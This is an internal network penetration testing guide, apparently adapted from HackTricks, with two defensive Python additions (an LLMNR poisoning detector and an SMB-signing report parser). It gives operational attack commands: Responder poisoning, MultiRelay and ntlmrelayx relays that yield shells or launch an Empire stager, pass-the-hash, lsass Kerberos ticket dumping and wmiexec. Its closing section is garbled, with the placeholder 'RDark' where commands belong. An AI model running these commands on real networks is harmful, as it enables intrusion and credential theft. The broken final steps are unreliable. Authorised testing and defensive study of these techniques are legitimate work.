Internal Penetration Testing Guide
https://book.hacktricks.xyz/pentesting/pentesting-network
Additional Tools
The following tools are not installed by default in the prerequisite toolset, but provide significant value in certain scenarios during testing:
- Bloodhound
- PowerSploit
- CrackMapExec
- Empire (outdated)
- Apfell: a cross-platform, post-exploitation red teaming framework built with Python 3, Docker, docker-compose, and a web browser UI.
- Covenant: a .NET command and control framework, a newer alternative to Empire.
- Sliver: a Golang C2 framework.
- Faction
- KeeThief
- UAC Bypass
  - https://github.com/FuzzySecurity/PowerShell-Suite/tree/master/Bypass-UAC
  - https://github.com/FuzzySecurity/DefCon25
- Impacket
- Automation for internal Windows penetration testing / AD security
- Better netcat shell
Logging Configuration
Windows (PowerShell):
The PowerShell profile below is loaded and executed automatically whenever a PowerShell prompt is opened. It maintains a persistent log/history of PowerShell commands (with and without timestamps).
- Create the following file:
C:\Users\[USERNAME]\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
- Save the following PowerShell code to this file:
```powershell
# Set file/folder to save history
$HistoryDir = "$([Environment]::GetFolderPath('UserProfile'))\PowerShellLogs"
$HistoryFilePath = "$HistoryDir\ps_history-$(Get-Date -f MM-dd-yyyy).txt"
$HistoryFilePathTimeStamped = "$HistoryDir\Timestamped\ps_history-TIMESTAMPED-$(Get-Date -f MM-dd-yyyy).txt"

# Out-File does not create missing folders, so make sure both exist (-Force also creates the parent)
New-Item -ItemType Directory -Path "$HistoryDir\Timestamped" -Force | Out-Null

# Output history destination file/folder to stdout
Write-Host "History will be written to the following files upon exiting: "
Write-Host "$HistoryFilePath" -ForegroundColor "green"
Write-Host "$HistoryFilePathTimeStamped" -ForegroundColor "green"

# Upon exit, dump history to file (PowerShell.Exiting fires on 'exit', not when the window is closed)
Register-EngineEvent PowerShell.Exiting -Action {
    Get-Date -Format g | Out-File -FilePath $HistoryFilePath -Append
    Get-History | Out-File -FilePath $HistoryFilePath -Append
} | Out-Null

# Upon exit, dump history with timestamps (StartExecutionTime/EndExecutionTime) to file
Register-EngineEvent PowerShell.Exiting -Action {
    Get-History | Format-List | Out-File -FilePath $HistoryFilePathTimeStamped -Append
} | Out-Null

# Adds ability to scroll history using up/down keys
Set-PSReadlineKeyHandler -Key UpArrow -Function HistorySearchBackward
Set-PSReadlineKeyHandler -Key DownArrow -Function HistorySearchForward
```
Metasploit:
The resource file described below runs automatically whenever msfconsole is launched. It ensures a history (both input and output) is kept of standard MSF commands/modules as well as of sessions (e.g., Meterpreter shells).
- Create the following file:
```
>>> head -n 8 /root/.msf4/msfconsole.rc
#[framework/core]
setg SessionLogging true
setg TimestampOutput true
setg ConsoleLogging true
setg LogLevel 3
setg PROMPT [%yel%T%whi] { %grnS:%S J:%J%whi} %whi%W
spool /root/.msf4/logs/spool.log
#[framework/ui/console]
```
Network Access Control (NAC) Testing
Check whether you obtain an address via DHCP; if you do not, a NAC solution may be in place.
MAC Filtering Bypass
Get the MAC address of other devices, including VoIP phones.
Set the MAC address:
macchanger --mac=XX:XX:XX:XX:XX:XX eth0
IPv6 Traffic Exclusion
Use nmap's "-6" option and/or Metasploit's "ipv6_multicast_ping" and "ipv6_neighbor" modules for IPv6 host discovery, as some NAC solutions focus strictly on IPv4 traffic.
List IPv6 addresses with Metasploit:
```
sudo msfconsole -q
msf > use auxiliary/scanner/discovery/ipv6_multicast_ping
msf auxiliary(ipv6_multicast_ping) > set RHOSTS fe80::4dc4:bd17:56a1:a472/64
msf auxiliary(ipv6_multicast_ping) > run
[*] Running module against fe80::
[*] Sending multicast pings...
[*] Listening for responses...
[*] |*| fe80::103a:5e16:5a41:6687 => 36:d0:0d:4b:26:64
```
Scan IPv6 addresses with Nmap:
nmap -6 -sV fe80::103a:5e16:5a41:6687
Dedicated NAC Bypass Device (Intrusive)
A dedicated physical device (e.g., Pwnplug) can be connected to a target machine and configured to bypass the implemented NAC mechanism.
Passive Reconnaissance / Information Gathering
Responder
Use the forked Responder.
Hashes are stored in /usr/share/responder/logs/[PROTOCOL]-[HASHTYPE]-[IPADDRESS].txt
Check for LLMNR/NBT-NS Requests:
responder -A -I [interface]
Actively Poison LLMNR/NBT-NS Requests:
responder -I [interface]
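From the defender's side, the LLMNR poisoning described above can be detected by baiting it: ask the segment for a name that cannot exist and treat any answer as spoofed. This added example (not from the guide or from Responder) builds the LLMNR query, parses replies and reports the responding host; the `canary-` naming, the timeout and `build_response` (which fabricates a sample reply so the parser can be self-tested offline) are the example's own assumptions.

```python
import random, socket, struct
LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355

def build_query(name, qid):
    """LLMNR A-record query for `name` (DNS wire format: 12-byte header + one question)."""
    qname = b"".join(bytes([len(lb)]) + lb.encode() for lb in name.split(".")) + b"\x00"
    return struct.pack("!HHHHHH", qid, 0, 1, 0, 0, 0) + qname + struct.pack("!HH", 1, 1)

def build_response(query, ip, ttl=30):
    """Constructed sample of a poisoner's reply to `query` (test data, not a real capture)."""
    answer = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, ttl, 4) + socket.inet_aton(ip)  # ptr, A, IN
    return query[:2] + struct.pack("!HHHHH", 0x8000, 1, 1, 0, 0) + query[12:] + answer

def skip_name(pkt, off):
    if (pkt[off] & 0xC0) == 0xC0:                  # 2-byte compression pointer
        return off + 2
    while pkt[off]:                                # length-prefixed labels, terminated by 0
        off += pkt[off] + 1
    return off + 1

def parse_answers(pkt, qid):
    """IPv4 addresses in `pkt` if it is a response to our query `qid`, otherwise []."""
    rid, flags, qd, an = struct.unpack("!HHHH", pkt[:8]) if len(pkt) >= 12 else (-1, 0, 0, 0)
    if rid != qid or not flags & 0x8000:           # too short, wrong ID, or QR bit clear
        return []
    off, addrs = 12, []
    for _ in range(qd):
        off = skip_name(pkt, off) + 4              # skip QTYPE and QCLASS
    for _ in range(an):
        off = skip_name(pkt, off)
        rtype, _, _, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
        if rtype == 1 and rdlen == 4:
            addrs.append(socket.inet_ntoa(pkt[off + 10:off + 14]))
        off += 10 + rdlen
    return addrs

def probe(timeout=2.0):
    """Ask the segment for a random name that cannot exist; any answer is a spoofed one."""
    name, qid = "canary-%08x" % random.getrandbits(32), random.getrandbits(16)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(build_query(name, qid), (LLMNR_GROUP, LLMNR_PORT))
    hits = []
    try:
        while True:
            pkt, (src, _) = sock.recvfrom(1024)
            if parse_answers(pkt, qid):            # src answered for a name that does not exist
                hits.append((src, parse_answers(pkt, qid)))
    except socket.timeout:
        return hits
```

Run `probe()` from a host on the segment under test; an empty list means nothing answered the bogus name within the timeout, while each hit names the poisoning host and the address it tried to hand out.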
Credential Theft/Reuse
SMB/NetNTLM Relay
If the host has SMB message signing disabled, it is possible to relay credentials; the destination also needs SMB message signing disabled. By default, non-server editions of Windows have SMB signing disabled.
Since MS08-068, it is not possible to relay credentials back to the same machine over the same protocol.
Testing for SMB Message Signing Nmap:
nmap -sS -Pn -n -p 139,445 --script smb-security-mode [TARGETSUBNET]
Testing for SMB Message Signing Responder:
python /usr/share/responder-multirelay/tools/RunFinger.py -g -i [TARGETSUBNET]
Testing for SMB Message Signing CrackMapExec:
cme smb [TARGETSUBNET] --gen-relay-list [OUTPUTFILE]
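To turn the signing checks above into a remediation list, this added example (not part of the guide) parses nmap's XML report (`-oX`) from the smb-security-mode scan and lists the hosts where message signing is not required, i.e. the ones a "require signing" policy change should fix. The sample XML is constructed, and the `elem key="message_signing"` layout is assumed to match what the NSE script emits.

```python
import xml.etree.ElementTree as ET

# Constructed sample of an nmap XML report (-oX) from the smb-security-mode scan; not a real capture.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host><status state="up"/><address addr="10.0.0.5" addrtype="ipv4"/>
    <hostscript><script id="smb-security-mode" output="...">
      <elem key="account_used">guest</elem>
      <elem key="authentication_level">user</elem>
      <elem key="challenge_response">supported</elem>
      <elem key="message_signing">disabled (dangerous, but default)</elem>
    </script></hostscript></host>
  <host><status state="up"/><address addr="10.0.0.10" addrtype="ipv4"/>
    <hostscript><script id="smb-security-mode" output="...">
      <elem key="message_signing">required</elem>
    </script></hostscript></host>
  <host><status state="up"/><address addr="10.0.0.11" addrtype="ipv4"/>
    <hostscript><script id="smb-security-mode" output="...">
      <elem key="message_signing">supported</elem>
    </script></hostscript></host>
  <host><status state="up"/><address addr="10.0.0.12" addrtype="ipv4"/></host>
</nmaprun>
"""

def signing_status(xml_text):
    """Map IPv4 address -> message_signing value for every host that answered the script."""
    status = {}
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        script = host.find("hostscript/script[@id='smb-security-mode']")
        if addr is None or script is None:
            continue                      # host down, filtered, or not speaking SMB
        elem = script.find("elem[@key='message_signing']")
        if elem is not None and elem.text:
            status[addr.get("addr")] = elem.text.strip()
    return status

def signing_not_required(xml_text):
    """Hosts where signing is 'disabled' or merely 'supported': these accept relayed sessions."""
    return sorted(ip for ip, s in signing_status(xml_text).items() if not s.startswith("required"))

if __name__ == "__main__":
    for ip in signing_not_required(SAMPLE_XML):
        print(f"{ip}: message_signing = {signing_status(SAMPLE_XML)[ip]}")
```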
Testing other services with Responder (servers are toggled in Responder.conf):
```
root@kali:/etc/responder# head -15 Responder.conf
[Responder Core]
; Servers to start
SQL = On
SMB = Off
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off
HTTPS = On
DNS = On
LDAP = On
```
Responder with Redirections:
responder -I [INTERFACE] -rv
Using Responder to get shells:
Running the MultiRelay command below will result in a shell if a relayed authentication request is successful. The -u parameter allows all users to be relayed (-u ALL) or a single user to be targeted.
python /usr/share/responder/tools/MultiRelay.py -t [TARGETIP] -u ALL
# Single user relay
python /usr/share/responder/tools/MultiRelay.py -t [TARGETIP] -u Admin
Impacket ntlmrelayx with a PowerShell command:
# If no command is provided, the SAM database will be dumped by default.
python /usr/share/doc/python-impacket/examples/ntlmrelayx.py -tf [TARGETSFILE] -c [EMPIRE POWERSHELL LAUNCHER COMMAND]
The resulting MultiRelay shell offers extended functionality, detailed in Laurent Gaffie's blog post, including remote Mimikatz commands.
Pass-the-Hash (PTH)
This technique requires a previously compromised NTLM/LM hash of an account's password. Note that this cannot be done using NetNTLM/NTLMv1/NTLMv2 hashes collected by Responder or similar tools.
- Compromise an NTLM/LM hash.
- Determine which machines the corresponding account (for the hash) has access to. This can be done in several ways:
  - Leverage Active Directory reconnaissance techniques to enumerate a list of logged-on users for all target machines. This is best accomplished using PowerView, one of the Recon modules of PowerSploit.
Mimikatz
pypykatz
Mimikatz implementation in pure Python.
Dumping Kerberos tickets from a dump file:
```
>>> pypykatz lsa -k /root/data/kerberos minidump lsass.dmp
INFO:root:Parcing file lsass.dmp
FILE: ========= lsass.dmp =======
[...]
>>> ls /root/data/kerberos
lsass.dmp_768ec70d.ccache
TSG_WINLAB.COM_CLIENT01$_krbtgt_WINLAB.COM-dc16ff32.kirbi
[...]
```
Viewing Kerberos tickets:
```
>>> kirbi2ccache TSG_WINLAB.COM_CLIENT01$_krbtgt_WINLAB.COM-dc16ff32.{kirbi,ccache}
>>> export KRB5CCNAME=/path/to/.ccache
>>> klist
Ticket cache: FILE:/root/data/kerberos/Admin.ccache
Default principal: [email protected]
Valid Starting       Expires              Service Principal
11/21/2019 20:39:01  11/22/2019 06:39:01  krbtgt/[email protected]
renew until 11/28/2019 20:39:01
```
Using Kerberos tickets:
>>> wmiexec.py -no-pass -k -dc-ip w.x.y.z domain/user@fqdn
Mimipenguin
A tool to dump the login passwords from memory
Active Directory Reconnaissance
Use Domain Account Without Domain-Joined Computer
Using a compromised domain user account, you can leverage the following technique to execute commands that interact with the target domain without using a domain-joined machine. Instead, you can run commands directly within your Windows testing machine/VM.
- Launch a command prompt (cmd.exe).
- Execute the following command. Note that the "PROGRAM" argument can be any program on your machine/VM, including cmd.exe, powershell.exe, mimikatz, etc. In this example, we'll launch cmd.exe and subsequently PowerShell (bypassing the execution policy using "-exec bypass").
RDark
- Enter the account password.
- Execute the following commands:
powershell RDark
- You can then confirm that you are running as the authenticated domain user within the target domain by issuing the following command:
powershell RDark